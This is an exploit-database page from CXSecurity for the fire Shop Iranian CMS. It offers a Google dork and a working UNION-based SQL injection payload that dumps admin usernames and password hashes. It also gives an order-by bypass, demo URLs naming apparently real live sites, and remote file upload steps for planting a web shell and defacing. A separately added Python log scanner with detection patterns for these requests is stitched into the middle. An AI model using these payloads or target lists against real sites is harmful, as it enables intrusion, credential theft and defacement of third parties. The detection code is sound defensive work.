fire Shop IRANIAN CMS SQL injection & Remote File Upload - CXSecurity.com

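Vulnerability ID: 1603074 Vulnerability type:
Published: 2019-05-10 Updated: 2019-05-10
CVE ID: N/A CNNVD-ID: N/A
Platform: N/A CVSS score: N/A
|Source
https://cxsecurity.com/issue/WLB-2019050109
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Exploit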
# Exploit Title: fire Shop IRANIAN CMS SQL injection & Remote File Upload
# Date: 2019-05-10
# Dork : intext:"قدرت گرفته از فروشگاه ساز فايرشاپ"
# Exploit Author: S I R M A X
# Vendor Homepage: firedesign.ir
# Version: Final Version
# Tested on: win,linux
=================================================================================
                                             [SQL injection]     

[+] Method ( Sql injection ) Nullix Security Team of IRan
[+] Admin Login Page : www.[Target].com/admin.php
[+]  parameter  : ID == php?ID=
=================
Mode Hash : MD5 
=================
Exploit ==> 
category.php?id=1' /*!50000UNION*/ /*!50000SELECT*/ 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(fireshop_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,username,0x3c62723e,0x70617373,0x203d3d3e20,password,0x3c62723e,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14-- -
<-> Method Bypass[ Order by ] ======>  you can use >> =  category.php?id=15' order by asc-- -
=================================================================================
Demo:
[+] http://perfectmarket.biz/sss/category.php?id=[SQL]
[+] http://www.banehsalami.com/غذاساز-فیلیپس-HR7628/category.php?id=[SQL]
=================================================================================
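Added example (not part of the original advisory and not the vendor's code): a log check for the request shapes shown above, flagging any category.php request whose id is not a plain integer and labelling the traits it carries. The log lines are constructed, the signature labels are this example's own, and it assumes legitimate category ids are numeric, as in id=1 and id=15 above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (client addresses are RFC 5737 documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2019:10:00:01 +0000] "GET /category.php?id=15 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/May/2019:10:00:05 +0000] "GET /category.php?id=15%27%20order%20by%2014--%20- HTTP/1.1" 200 310',
    '198.51.100.7 - - [10/May/2019:10:00:09 +0000] "GET /sss/category.php?id=1%27%20/*!50000UNION*/%20/*!50000SELECT*/%201,2,3--%20- HTTP/1.1" 200 900',
    '192.0.2.10 - - [10/May/2019:10:00:12 +0000] "GET /product.php?id=7 HTTP/1.1" 200 2048',
]

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
NUMERIC = re.compile(r"[0-9]+")

# Traits of the request shapes in the advisory; the label names are hypothetical.
SIGNATURES = [
    ("mysql-versioned-comment", re.compile(r"/\*!\d*")),
    ("union-select", re.compile(r"union.*select", re.I | re.S)),
    ("order-by", re.compile(r"order\s+by", re.I)),
    ("sql-comment-terminator", re.compile(r"--\s|#")),
    ("quote", re.compile(r"['\"]")),
]

def scan(lines, path_suffix="/category.php", param="id"):
    """Return (client, decoded_value, reasons) for every non-numeric value of `param`."""
    findings = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not url.path.lower().endswith(path_suffix):
            continue
        # parse_qs percent-decodes values; fold names so ID= and id= both match.
        for key, values in parse_qs(url.query, keep_blank_values=True).items():
            if key.lower() != param:
                continue
            for value in values:
                if NUMERIC.fullmatch(value):
                    continue  # assumption: a legitimate category id is a plain integer
                reasons = [name for name, rx in SIGNATURES if rx.search(value)]
                findings.append((line.split()[0], value, reasons or ["non-numeric"]))
    return findings

if __name__ == "__main__":
    for client, value, reasons in scan(SAMPLE_LOG):
        print(client, reasons, repr(value))
```

The same integer-only rule belongs in the application itself: cast or reject the id before it reaches the query, and bind it as a parameter.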
  Remote File upload
============================

[+] RFU Method
<+> POC : http://www.banehsalami.com/upload.php

<-> Add URL site.com/upload.php
<+> You can Upload Shell and Def 
<-> for Bypass Filetype 
<=> using Tamper Data Or Charles 

======================================